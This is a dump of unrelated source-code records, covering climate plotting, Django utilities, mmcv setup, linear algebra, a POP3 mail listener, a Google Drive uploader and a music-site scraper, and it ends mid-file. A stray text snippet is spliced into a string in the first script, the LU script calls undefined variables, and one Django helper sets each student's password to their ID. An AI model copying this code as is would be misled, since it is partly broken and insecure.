ttest\n###siglev=0.05\n###\nmeans_ctl_dn=means_yby_ctl_dn\nmeans_exp_dn=means_yby_exp_dn\ndiffs_dn=means_exp_dn-means_ctl_dn\n###ttest=stats.ttest_ind(means_yby_ctl_dn,means_yby_exp_dn,axis=0)\n###pvalues_dn=ttest.pvalue\n###diffs_sig_dn=np.zeros(diffs_dn.shape)\n###diffs_sig_dn[:,:]=np.nan\n###\nmeans_ctl_up=means_yby_ctl_up\nmeans_exp_up=means_yby_exp_up\ndiffs_up=means_exp_up-means_ctl_up\n###ttest=stats.ttest_ind(means_yby_ctl_up,means_yby_exp_up,axis=0)\n###pvalues_up=ttest.pvalue\n###diffs_sig_up=np.zeros(diffs_up.shape)\n###diffs_sig_up[:,:]=np.nan\n###\nmeans_ctl_net=means_yby_ctl_net\nmeans_exp_net=means_yby_exp_net\ndiffs_net=means_exp_net-means_ctl_net\ndiffs_net_bb=diffs_net[0,:]+diffs_net[1,:]\n\n#compute domain mean\n#diffs_net_bb_mask=np.where(means_yby_ctl_fice[:]>0.1,diffs_net_bb,np.nan)\ndiffs_net_bb_mask=np.ma.MaskedArray(diffs_net_bb,mask=means_yby_ctl_fice[:]>0.1)\n#print(diffs_net_bb_mask)\nlatr=np.deg2rad(lat)\nweights=np.cos(latr)\navg_Antarctic=np.average(diffs_net_bb_mask[0:40],axis=0,weights=weights[0:40]) \navg_Arctic=np.average(diffs_net_bb_mask[60:],axis=0,weights=weights[60:]) \n\n#print(avg_Antarctic)\n#print(avg_Arctic)\n#exit()\n\n###ttest=stats.ttest_ind(means_yby_ctl_net,means_yby_exp_net,axis=0)\n###pvalues_net=ttest.pvalue\n###diffs_sig_net=np.zeros(diffs_net.shape)\n###diffs_sig_net[:,:]=np.nan\n###\nzeros=np.zeros(diffs_dn.shape)\n###\n####print(diffs_sig.size)\n###\n###for iv in range(pvalues_up.shape[0]):\n### for ip in range(pvalues_up.shape[1]):\n### if pvalues_up[iv,ip] < siglev:\n### diffs_sig_up[iv,ip]=diffs_up[iv,ip]\n### #else:\n### # diffs_unsig[iv,ip]=diffs[iv,ip]\n###\n###for iv in range(pvalues_dn.shape[0]):\n### for ip in range(pvalues_dn.shape[1]):\n### if pvalues_dn[iv,ip] < siglev:\n### diffs_sig_dn[iv,ip]=diffs_dn[iv,ip]\n### #else:\n### # diffs_unsig[iv,ip]=diffs[iv,ip]\n###\n###for iv in range(pvalues_net.shape[0]):\n### for ip in range(pvalues_net.shape[1]):\n### if pvalues_net[iv,ip] < siglev:\n### diffs_sig_net[iv,ip]=diffs_net[iv,ip]\n### #else:\n### # diffs_unsig[iv,ip]=diffs[iv,ip]\n\n#----------------\n# make the plot\n#----------------\n\nfig=plt.figure(figsize=(7,4))\n\n#ax1=fig.add_axes([0.14,0.58,0.8,0.36])\n#ax1.plot(lat[:],means_ctl_dn[0,:],color=\"k\",lw=2,ls=\"-\",label=\"UV+VIS down\")\n#ax1.plot(lat[:],means_ctl_dn[1,:],color=\"r\",lw=2,ls=\"-\",label=\"NIR down\")\n#ax1.plot(lat[:],means_ctl_up[0,:],color=\"g\",lw=2,ls=\"-\",label=\"UV+VIS up\")\n#ax1.plot(lat[:],means_ctl_up[1,:],color=\"darkorchid\",lw=2,ls=\"-\",label=\"NIR up\")\n#ax1.legend(fontsize=8)\n#ax1.set_title(\"SFC Fluxes (CESM2)\",fontsize=14)\n#ax1.set_ylabel(units,fontsize=14)\n#ax1.set_xlim(-90,90)\n#ax1.set_ylim(-4,160)\n#plt.xticks(fontsize=12)\n#plt.yticks(fontsize=12)\n\nax2=fig.add_axes([0.14,0.15,0.8,0.72])\n# Figure 3c: UV+VIS.\nax2.plot(lat[:],diffs_dn[0,:],color=\"k\",lw=1,label=\"\\u0394UV+VIS down\")\nax2.plot(lat[:],diffs_up[0,:],color=\"g\",lw=1,ls=\"-\",label=\"\\u0394UV+VIS up\")\nax2.plot(lat[:],diffs_net[0,:],color=\"k\",lw=2,ls=\"--\",label=\"\\u0394UV+VIS net\")\n\n# Figure 3e: NIR.\n#ax2.plot(lat[:],diffs_dn[1,:],color=\"r\",lw=1,label=\"\\u0394NIR 
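A quick sanity check of the cosine-latitude weighting used for avg_Antarctic and avg_Arctic above: the weighted average of a field that is 1 everywhere must come out exactly 1 on any grid.

import numpy as np

lat = np.linspace(-90, 90, 96)
weights = np.cos(np.deg2rad(lat))
print(np.average(np.ones_like(lat), weights=weights))  # -> 1.0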
down\")\n#ax2.plot(lat[:],diffs_up[1,:],color=\"darkorchid\",lw=1,ls=\"-\",label=\"\\u0394NIR up\")\n#ax2.plot(lat[:],diffs_net[1,:],color=\"r\",lw=2,ls=\"--\",label=\"\\u0394NIR net\")\n\nax2.plot(lat[:],zeros[0,:],color=\"gray\",lw=1)\nax2.legend(fontsize=10)\nax2.set_title(\"Diff in SFC Flux (TSIS-1 - CESM2, diag)\",fontsize=14) #+var_long_name,fontsize=12)\nax2.set_ylabel(units,fontsize=14)\nax2.set_xlabel(\"Latitude\",fontsize=14)\nax2.set_xlim(-90,90)\nax2.set_ylim(-1.6,2.15)\nplt.xticks(fontsize=12)\nplt.yticks(fontsize=12)\n\n# add shading \ncollection = collections.BrokenBarHCollection.span_where(lat[:], ymin=-1.6, ymax=2.15, \\\n where=means_yby_ctl_fice >0.1,facecolor='y',alpha=0.3)\nax2.add_collection(collection)\n\nplt.savefig(\"./figures/\"+figure_name+\".pdf\")\nplt.savefig(\"./figures/\"+figure_name+\".png\",dpi=150)\nplt.show()\n\nexit()\n","sub_path":"plots/plot_fig3ce_zonal_mean_net_sfc_diff_5day.py","file_name":"plot_fig3ce_zonal_mean_net_sfc_diff_5day.py","file_ext":"py","file_size_in_byte":9699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"187591141","text":"import os\nimport xlrd\nimport yaml\nfrom django.db import transaction, IntegrityError\nfrom django.contrib.auth.hashers import make_password\nfrom ..models import StudentProfile\nfrom ..auth import CustomUser\nfrom ..serializers import CustomUserSerializer\nfrom ..models import Subject\nfrom testing_system.settings import QUESTIONS_PACK_ROOT\n\n\ndef jwt_response_payload_handler(token, user=None, request=None):\n return {\n 'token': token,\n 'user': CustomUserSerializer(user, context={'request': request}).data\n }\n\n\ndef upload_students(file, callback=None):\n book = xlrd.open_workbook(file_contents=file.read())\n sheet = book.sheet_by_index(0)\n edu_group = sheet.cell(0, 0).value\n record_keys = ['username', 'last_name', 'first_name', 'patronymic']\n for row in range(1, sheet.nrows):\n record = {key: sheet.cell(row, col).value for key, col in zip(record_keys, range(0, len(record_keys)))}\n username_error_msg = 'Номер зачетной книжки должен являться целым числом'\n username = record['username']\n try:\n username_int = int(username)\n except ValueError:\n raise TypeError(username_error_msg)\n if type(username) is not float:\n raise TypeError(username_error_msg)\n record['username'] = str(username_int)\n record['password'] = make_password(record['username'])\n with transaction.atomic():\n try:\n user = CustomUser.objects.create(**record)\n profile = StudentProfile(edu_group=edu_group, user=user)\n profile.full_clean()\n profile.save()\n except IntegrityError:\n if callback:\n callback(f'Пользователь {record[\"first_name\"]} {record[\"last_name\"]} \\\n ({record[\"username\"]}) уже существует в базе данных')\n\n\ndef get_questions_pack(tutor_profile, subject_id=None):\n subjects = Subject.objects.filter(tutorprofile=tutor_profile)\n if subject_id:\n subjects = subjects.filter(pk=subject_id)\n data = []\n for subject in subjects:\n filepath = os.path.join(QUESTIONS_PACK_ROOT, f'{subject.name}.yml')\n obj = {\n 'subject': subject.name,\n 'questions': [],\n }\n if os.path.exists(filepath):\n with open(filepath, 'r') as f:\n obj['questions'] = yaml.safe_load(f)\n data.append(obj)\n return data\n","sub_path":"api/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"581412066","text":"import sys\nfrom setuptools import 
find_packages, setup\n\ninstall_requires = [\n 'numpy>=1.11.1', 'pyyaml', 'six', 'addict', 'requests', 'opencv-python'\n]\nif sys.version_info < (3, 3):\n install_requires.append('backports.shutil_get_terminal_size')\nif sys.version_info < (3, 4):\n install_requires.extend(['enum34', 'pathlib'])\n\n\ndef readme():\n with open('README.rst') as f:\n content = f.read()\n return content\n\n\ndef get_version():\n version_file = 'mmcv/version.py'\n with open(version_file, 'r') as f:\n exec(compile(f.read(), version_file, 'exec'))\n return locals()['__version__']\n\n\nsetup(\n name='mmcv',\n version=get_version(),\n description='Open MMLab Computer Vision Foundation',\n long_description=readme(),\n keywords='computer vision',\n packages=find_packages(),\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'License :: OSI Approved :: GNU General Public License v3 (GPLv3)',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Topic :: Utilities',\n ],\n url='https://github.com/open-mmlab/mmcv',\n author='Kai Chen',\n author_email='chenkaidev@gmail.com',\n license='GPLv3',\n setup_requires=['pytest-runner'],\n tests_require=['pytest'],\n install_requires=install_requires,\n zip_safe=False)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"392878281","text":"#-*-coding:utf-8-*-\nimport mymath\n\n#求从 1~N 中选取 7 个合数时,最多经过 6 层就可以与其他所有数产生联系的最小的 N 。 \n\n#分析:数字都可以由质数的乘机来表示,所以推出公约数中必有质数进而推出最短得到N的方法为质数乘机递推,a*b,b*c,c*d...\n#若第一步为a*a不影响后续单一对应,故第一个数可以为平方数,同理可得最后以为也可以为平方数,其中a,b,c...均为质数\n#下一步求出乘法式子中最下的等式--->对质数排序然后两两相乘求出最大值进行比较\n\n#代码\n\ndef ReN(N):\n pirmlist=mymath.RePrim(N)\n pirmlist.pop(0)\n pirmlist=mymath.SubPerm(pirmlist,N-1)\n max = 9999\n tmplist = []\n for i in pirmlist:\n mulitilst = mymath.CircleNMultiList(i,2)\n mulitilst.pop()\n mulitilst.append(i[0]*i[0])\n mulitilst.append(i[-1]*i[-1])\n tmp=mymath.ListMax(mulitilst)\n if tmp < max:\n max = tmp\n tmplist = i\n return [max,tmplist]\n\nif __name__==\"__main__\":\n print(ReN(7))\n","sub_path":"Code/Q19--朋友的朋友也是朋友吗.py","file_name":"Q19--朋友的朋友也是朋友吗.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"142213382","text":"# ... 
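get_version() in the setup.py record above execs mmcv/version.py and reads __version__ back out of locals(). A more robust variant of the same trick uses an explicit namespace; the version string here is a stand-in.

source = "__version__ = '0.1.0'\n"  # stands in for mmcv/version.py
namespace = {}
exec(compile(source, 'version.py', 'exec'), namespace)
print(namespace['__version__'])  # -> 0.1.0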
ENTER YOUR CODE HERE ...\nimport numpy as np\n\ndef lu_perm(a):\n \"\"\"Construct the LU decomposition of the input matrix.\n \n with permutation.\n \"\"\"\n N = a.shape[0]\n \n u = a.copy()\n L = np.eye(N)\n P = np.eye(N)\n for j in range(N-1):\n lam = np.eye(N)\n \n vector = u[j:,j]\n #print(j)\n #print(vector)\n maxidx=np.argmax(np.absolute(vector))\n #print(maxidx)\n #print(u)\n u[[j,maxidx+j],:]=u[[maxidx+j,j],:]\n L[:,[j,maxidx+j]]=L[:,[maxidx+j,j]]\n P[[j,maxidx+j],:]=P[[maxidx+j,j],:]\n \n gamma = u[j+1:, j] / u[j, j]\n \n lam[j+1:, j] = -gamma\n u = lam @ u\n\n lam[j+1:, j] = gamma\n L = L @ lam\n return P, L, u\n\ndef lu_perm_res(a):\n P,L,U=lu_perm(a)\n print(P)\n print(L)\n print(U)\n print( L@U )\n print(a)\n print(L@U - a)\n\nprint(lu_perm_res(a))\nprint(lu_perm_res(a1))\n\n","sub_path":"week1_LU_perm.py","file_name":"week1_LU_perm.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"559455604","text":"import datetime\nfrom typing import List, Set, Type\n\nfrom diagnosers.abstract_diagnoser import AbstractDiagnoser\nfrom experimentation.metrics.abstract_metric import AbstractMetric\nfrom experimentation.metrics.single_diagnosis_results import SingleDiagnoserResults\nfrom experimentation.sub_experiment.sub_experiment_results import SubExperimentResults\nfrom models.diagnosis.dx_problem_instances.base_dx_problem_instance import BaseDxProblemInstance\nfrom models.test_suite_models.logic_method import LogicMethod\n\n\nclass SubExperiment:\n \"\"\"\n a subexperiment runs an instance against multiple diagnosers, and compares results\n \"\"\"\n\n def __init__(self, index: int, instance: BaseDxProblemInstance, diagnosers: List[AbstractDiagnoser],\n ground_truth: Set[LogicMethod], metrics: List[AbstractMetric]):\n self.index = index\n self.instance = instance\n self.diagnosers = diagnosers\n self.ground_truth = ground_truth\n self.metrics = metrics\n\n def run(self) -> SubExperimentResults:\n results = []\n for diagnoser in self.diagnosers:\n start_time = datetime.datetime.now()\n diag_solution = diagnoser.try_to_diagnose(self.instance)\n end_time = datetime.datetime.now()\n dx_time = end_time - start_time\n dx_time_ms = dx_time.total_seconds() * 1000\n single_diag_results = SingleDiagnoserResults(sub_experiment_index=self.index,\n diagnoser=diagnoser, diagnoser_solution=diag_solution,\n dx_time_ms=dx_time_ms,\n ground_truth=self.ground_truth, metrics=self.metrics)\n results.append(single_diag_results)\n return SubExperimentResults(sub_experiment_index=self.index, instance=self.instance, results=results)\n\n def __repr__(self):\n return f''\n","sub_path":"experimentation/sub_experiment/sub_experiment.py","file_name":"sub_experiment.py","file_ext":"py","file_size_in_byte":1987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"623062067","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport pandas as pd\nfrom sqlalchemy import create_engine\n\n\n# In[4]:\n\n\nengine = create_engine(r\"sqlite:///C:\\Users\\\\Brian\\salesdata.db\")\nsql = \"select name from sqlite_master\"\n\"where type = 'table';\"\nsales_data_df = pd.read_sql(sql, engine)\nsales_data_df\n\n\n# In[5]:\n\n\nsql_table = \"select * from scores\"\nscore_data_df = pd.read_sql(sql_table, engine)\nscore_data_df.head()\n\n","sub_path":"Assignment 7.2.2.py","file_name":"Assignment 
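The LU snippet above calls lu_perm_res(a) without defining a. A hypothetical test input makes the check concrete: with the conventions used there (rows of u and P swapped, columns of L swapped), the factors satisfy L @ U == a, which is exactly what lu_perm_res prints as L@U - a.

import numpy as np

rng = np.random.default_rng(1)
a = rng.normal(size=(4, 4))   # hypothetical test matrix
P, L, U = lu_perm(a)          # assumes lu_perm defined above
print(np.allclose(L @ U, a))  # -> True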
7.2.2.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"314294883","text":"from copy import deepcopy\nfrom openpyxl import load_workbook\nimport os\n\nfrom common.log import logger\nfrom common.error import NotFoundCaseId, FileContentError, ConfKeyNotFound, FileNotFoundError2\nfrom common.parseyaml import config\n\n\nlogger = logger()\n\n\nclass XLSX:\n\n def __init__(self, name=None):\n # Handle data file absolute name\n if name:\n # If provided file name\n self.name = name\n else:\n try:\n # Read data file from config\n self.name = config.get_conf(\"file\").get(\"case_file\")\n except ConfKeyNotFound:\n # Use default file path\n self.name = os.path.abspath(\"./data/cmdb_data.xlsx\")\n if not os.path.exists(self.name):\n message = \"Data file not exist!\"\n raise FileNotFoundError2(message)\n # Read contents from data file\n self.workbook = load_workbook(filename=self.name)\n self.sheets = self.workbook.sheetnames\n # Only use the 1st sheet.\n if len(self.sheets) > 1:\n logger.warn(\"The excel file have more than one sheet, now we use the first sheet.\")\n\n self.content = self.workbook[self.sheets[0]]\n self.case_content = {}\n self.ids_content = {}\n\n def _case_content(self):\n # Get all rows by generator\n rows = self.content.rows\n # Get names of every column\n head_row = next(rows)\n heads = [x.value for x in head_row]\n # Store every case content to content_list\n content_list = []\n # Add every case content to content_list\n for case in rows:\n case_dict = {}\n current_case = [x.value for x in case]\n # Set value to every column's name as dict\n for head, value in zip(heads, current_case):\n case_dict[head] = value\n content_list.append(case_dict)\n return content_list\n\n def get_data_by_id(self, id_: (str, int)) -> dict:\n \"\"\"\n You can get data by id of every case\n :param id_:\n :return: dict\n {\n \"1\": {\n 'id': 1,\n 'section': '初始化',\n 'case_id': 16761,\n 'case_name': '清空数据'\n ...\n }\n }\n \"\"\"\n id_ = str(id_)\n # If ids_content is not empty, it already contains all cases\n if self.ids_content:\n return self.ids_content.get(id_)\n\n # Add all case to ids_content\n field_name = \"id\"\n case_content = self._case_content()\n for content in case_content:\n id_name = content.get(field_name, -1)\n self.ids_content[str(id_name)] = content\n return self.ids_content.get(id_)\n\n def get_data_by_case_id(self, column_key: (str, int), column=\"case_id\") -> list:\n \"\"\"\n Get a group data by case_id\n :param column: The column's name used to sort data\n :param column_key: get the column_key of data\n :return: list like below\n [\n {\n 'id': 10,\n 'section': '上传训练',\n 'case_id': 2862\n },\n {\n 'id': 11,\n 'section': '上传训练',\n 'case_id': 2862\n },\n {\n 'id': 12,\n 'section': '上传训练',\n 'case_id': 2862\n }\n ]\n \"\"\"\n column_key = str(column_key)\n if self.case_content:\n return self.case_content.get(column_key)\n case_content: list = self._case_content()\n for content in case_content:\n id_name = content.get(column, -1)\n case_id_str = str(id_name)\n # If self.case_content already has case_id_str, append case to it, otherwise, set to list first\n if case_id_str not in self.case_content:\n self.case_content[case_id_str] = []\n self.case_content[case_id_str].append(content)\n return self.case_content.get(column_key)\n\n\nif __name__ == \"__main__\":\n # file_name = \"/Users/eoitek/PycharmProjects/Alert2.3/data/alert2.3_test_data.xlsx\"\n xlsx = XLSX(None)\n data = 
xlsx.get_data_by_case_id(17777)[2]\n","sub_path":"common/xlsx.py","file_name":"xlsx.py","file_ext":"py","file_size_in_byte":4227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"395072239","text":"import pysnooper\n\n@pysnooper.snoop()\ndef permute(nums):\n res = []\n def backtrack(tem,num):\n if not num:\n res.append(tem)\n\n for i in range(len(num)):\n backtrack(tem+[num[i]],num[:i]+num[i+1:])\n backtrack([],nums)\n return res\n\nif __name__ == \"__main__\":\n nums = [1,2,3]\n permute(nums)\n","sub_path":"Python/46-全排列.py","file_name":"46-全排列.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"94306933","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n#2007-06-25\n# Copyright 2007 Michael Towers\n\n# This file is part of Zeugs.\n#\n# Zeugs is free software; you can redistribute it and/or modify it under\n# the terms of the GNU General Public License as published by the Free\n# Software Foundation; either version 2 of the License, or (at your\n# option) any later version.\n#\n# Zeugs is distributed in the hope that it will be useful, but\n# WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n# See the GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with Zeugs; if not, write to the Free Software Foundation, Inc.,\n# 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\n#\n\"\"\"A simple dialog to fetch the password for connecting to the\nmaster (PostgreSQL) database.\n\"\"\"\n# pyuic4 command:\n# pyuic4 -o ui_dlg_getPw.py dlg_getPw.ui\n\n# To convert the i18n stuff to gettext form, use gettextify, e.g.\n# gettextify ui_dlg_getPw.py\n\nfrom PyQt4 import QtCore, QtGui\n\nimport ui_dlg_getPw as ui_dlg\n\ndef getPw(host, name, user):\n Dialog = QtGui.QDialog()\n ui = ui_dlg.Ui_Dialog()\n ui.setupUi(Dialog)\n\n ui.lineEdit_host.setText(host)\n ui.lineEdit_name.setText(name)\n ui.lineEdit_user.setText(user)\n\n ui.lineEdit_pw.setFocus()\n if not Dialog.exec_():\n return None\n\n return unicode(ui.lineEdit_pw.text())\n","sub_path":"tags/zeugs-source-2.2.10/zgsync/getPw.py","file_name":"getPw.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"120657384","text":"import re\nimport time\nfrom poplib import POP3\n\nfrom EmailLibrary.base import LibraryComponent, keyword\n\n\nclass ReceiveKeywords(LibraryComponent):\n time_out = 300\n\n def __init__(self, ctx):\n LibraryComponent.__init__(self, ctx)\n\n @keyword\n def listen_to_mail_account(self, account_id=None):\n account = self.account(account_id)\n\n pop_client = POP3(account.pop3_host, account.pop3_port)\n pop_client.user(account.login_name)\n pop_client.pass_(account.login_pass)\n\n stat = pop_client.stat()\n pop_client.quit()\n account.set_pop_listener(stat)\n\n @keyword\n def exist_new_mail_with_subject(self, subject, account_id=None):\n def check_func(content):\n return len(re.findall(subject, content)) > 0\n mail_index = self.exist_new_mail_with_header(account_id, check_func)\n self.info('Find mail at index {}.'.format(mail_index))\n\n @keyword\n def exist_new_mail_with_message_id(self, message_id, account_id=None):\n def check_func(content):\n return len(re.findall(message_id, content)) > 0\n mail_index = 
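The header handling in _case_content() above pairs the first spreadsheet row with every later row. The same zip pattern in isolation, with case ids taken from the record's docstrings:

heads = ['id', 'section', 'case_id']
rows = [[1, 'init', 16761], [2, 'upload', 2862]]
print([dict(zip(heads, row)) for row in rows])
# -> [{'id': 1, 'section': 'init', 'case_id': 16761}, ...]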
self.exist_new_mail_with_header(account_id, check_func)\n self.info('Find mail at index {}.'.format(mail_index))\n\n def exist_new_mail_with_header(self, account_id, check_func):\n account = self.account(account_id)\n listen_start = account.pop3_listener\n time_start = time.time()\n time_end = time_start + self.time_out\n\n pop_client = POP3(account.pop3_host, account.pop3_port)\n pop_client.user(account.login_name)\n pop_client.pass_(account.login_pass)\n\n while True:\n if time.time() > time_end:\n break\n\n listen_end = pop_client.stat()[0]\n for i in range(listen_start, listen_end + 1):\n headers = pop_client.top(i, 0)[1]\n for header in headers:\n if check_func(header):\n return i\n listen_start = listen_end\n\n raise AssertionError('No corresponding mail received.')\n","sub_path":"src/EmailLibrary/keywords/receive.py","file_name":"receive.py","file_ext":"py","file_size_in_byte":2083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"26429767","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /home/travis/build/universalcore/unicore.distribute/unicore/distribute/tasks.py\n# Compiled at: 2016-05-07 05:25:40\nfrom pyramid_celery import celery_app as app\nfrom elasticgit import EG\nfrom unicore.content.models import Page, Category, Localisation\n\n@app.task(ignore_result=True)\ndef fastforward(repo_path, index_prefix, es={}):\n workspace = EG.workspace(repo_path, index_prefix=index_prefix, es=es)\n workspace.fast_forward()\n workspace.reindex(Page)\n workspace.reindex(Category)\n workspace.reindex(Localisation)","sub_path":"pycfiles/unicore.distribute-1.1.2.tar/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"48200212","text":"from googleapiclient.http import MediaFileUpload\nfrom delete import service\ndef CheckFileDir(FileName):\n # page_token = None\n results = service.files().list(q='trashed=false',spaces='drive',fields=\"nextPageToken, files(id, name)\",pageSize=400).execute()\n items = results.get('files', [])\n\n # print(len(items))\n # for i in items: \n if not items:\n print('No files found.')\n return None\n else:\n # print('Files:')\n for item in items:\n # print(item['name'])\n if(item['name'] == FileName):\n print(FileName + \" is already there\")\n # print(item['name'])\n return item['id']\n \ndef delete_file(filename):\n\n file_id = CheckFileDir(filename)\n print(file_id)\n try:\n service.files().delete(fileId=file_id).execute()\n print(\"success : successfully deleted the file\")\n except Exception as e:\n print('An error occurred: %s',e)\ndef UploadFile(path,local_filename,upload_name):\n file = CheckFileDir(upload_name)\n # print(file)\n if(file != None):\n ask = input(\"Wanna replace ? delete old one? Y/N: \")\n if(ask.lower() == 'y' ):\n delete_file(upload_name)\n \n file_metadata = {\n 'name': upload_name,\n 'mimeType': 'application/vnd.google-apps.spreadsheet'\n }\n media = MediaFileUpload(path+local_filename,\n mimetype='application/vnd. 
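A standalone sketch of the POP3 header scan done by exist_new_mail_with_header above; the host and credentials are placeholders, and TOP(i, 0) fetches headers only, as in the record. Note that the header lines come back as bytes.

from poplib import POP3

client = POP3('pop.example.com', 110)   # hypothetical host
client.user('user@example.com')
client.pass_('secret')
count = client.stat()[0]
for i in range(1, count + 1):
    headers = client.top(i, 0)[1]       # raw header lines, bytes
    if any(b'Subject: hello' in line for line in headers):
        print('match in message', i)
client.quit()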
openxmlformats-officedocument',\n resumable=True)\n file = service.files().create(body=file_metadata,\n media_body=media,\n fields='id').execute()\n print('File ID: %s' % file.get('id'))\n \n\nif __name__ == '__main__':\n path = 'I:\\\\clients\\\\jgil1000\\\\'\n drive_filename = \"newFile\"\n filename = \"agency.xlsx\"\n UploadFile(path,filename,drive_filename)\n","sub_path":"clients/upload.py","file_name":"upload.py","file_ext":"py","file_size_in_byte":1896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"653036976","text":"from urllib import request\r\n\r\nfrom bs4 import BeautifulSoup\r\n\r\nfrom cz.api.category import Category\r\n\r\n# url = 'http://www.kuwo.cn/www/category/index/'\r\n# headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0'}\r\n# cookie = cookiejar.CookieJar()\r\n# handler = request.HTTPCookieProcessor(cookie)\r\n# opener = request.build_opener(handler,request.HTTPHandler(debuglevel=1))\r\n# request.install_opener(opener)\r\n\r\nheaders = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0'}\r\n\r\n#获取类别(Python对象)\r\ndef fetch_categories():\r\n url = 'http://www.kuwo.cn/www/category/index/'\r\n req = request.Request(url, data=None, headers=headers)\r\n html = request.urlopen(req).read()\r\n soup = BeautifulSoup(html,'html5lib')\r\n\r\n cates = []\r\n for bang in soup.find_all('div',{'class':'bang'}):\r\n #print('大类',bang.h2['data-catid'],bang.h2.get_text())\r\n cate = Category(bang.h2['data-catid'],bang.h2.get_text())\r\n children_cates = []\r\n for a in bang.find('li').find_all('a'):\r\n #print(a.attrs['data-catid'],a.get_text())\r\n child = Category(a.attrs['data-catid'], a.get_text())\r\n children_cates.append(child)\r\n cate.children = children_cates\r\n cates.append(cate)\r\n\r\n return cates\r\n\r\n#获取类别(json对象)\r\ndef fetch_json_categories():\r\n url = 'http://www.kuwo.cn/www/category/index/'\r\n req = request.Request(url, data=None, headers=headers)\r\n html = request.urlopen(req).read()\r\n soup = BeautifulSoup(html,'html5lib',from_encoding='uft-8')\r\n\r\n cates = list()\r\n for bang in soup.find_all('div',{'class':'bang'}):\r\n big_cate = dict()\r\n big_cate['id'] = bang.h2['data-catid']\r\n big_cate['name'] = bang.h2.get_text()\r\n children_cates = list()\r\n for a in bang.find('li').find_all('a'):\r\n child_cate = dict()\r\n child_cate['id'] = a.attrs['data-catid']\r\n child_cate['name'] = a.get_text()\r\n children_cates.append(child_cate)\r\n big_cate['children'] = children_cates\r\n cates.append(big_cate)\r\n return cates\r\n #return json.dumps(cates,ensure_ascii=False)\r\n\r\n\r\n# cats = fetch_json_categories()\r\n# print(cats)\r\n\r\n#获取歌词\r\ndef fetch_music_lyric(mid):\r\n url = 'http://www.kuwo.cn/yinyue/{}'.format(mid)\r\n req = request.Request(url, data=None, headers=headers)\r\n html = request.urlopen(req).read()\r\n soup = BeautifulSoup(html, 'html5lib', from_encoding='uft-8')\r\n lyric = list()\r\n for p in soup.find_all('p',{'class':'lrcItem'}):\r\n lyric.append(p.get_text())\r\n return lyric\r\n\r\n#获取歌曲详细信息(名称,链接,歌手,音乐id)\r\ndef fetch_music_detail(catId=88096, pageno=0, pagesize=50):\r\n url = 'http://www.kuwo.cn/www/category/content/music?catId={0}&pn={1}&rn={2}'.format(catId, pageno, pagesize)\r\n req = request.Request(url, data=None, headers=headers)\r\n html = request.urlopen(req).read()\r\n soup = BeautifulSoup(html, 'html5lib', from_encoding='uft-8')\r\n musics = []\r\n for li in 
soup.find_all('li'):\r\n name = li.find('div',{'class':'name'}).find('a').get_text()\r\n href = li.find('div',{'class':'name'}).find('a').attrs['href']\r\n artist = li.find('div',{'class':'artist'}).find('a').get_text()\r\n music_id = href.replace('http://www.kuwo.cn/yinyue/','')\r\n #lyric = fetch_music_lyric(href)\r\n path = 'http://antiserver.kuwo.cn/anti.s?rid=MUSIC%5F{0}&format={1}&response=url&type=convert%5Furl'.format(music_id,'mp3')\r\n music = {}\r\n music['name'] = name\r\n music['href'] = href\r\n music['artist'] = artist\r\n music['id']= music_id\r\n #music['lyric'] = lyric\r\n music['path'] = path\r\n musics.append(music)\r\n return musics\r\n #return json.dumps(musics,ensure_ascii=False)\r\n\r\n# res = fetch_music_detail()\r\n# print(res)\r\n\r\n# res = fetch_music_lyric('507539')\r\n# print(res)\r\n\r\n\r\n","sub_path":"music_spider.py","file_name":"music_spider.py","file_ext":"py","file_size_in_byte":4018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"497266032","text":"# coding: utf-8\n# Store the image URL together with the score commit to the SQL database\n# Change state to end editing session\n# Created by James Raphael Tiovalen 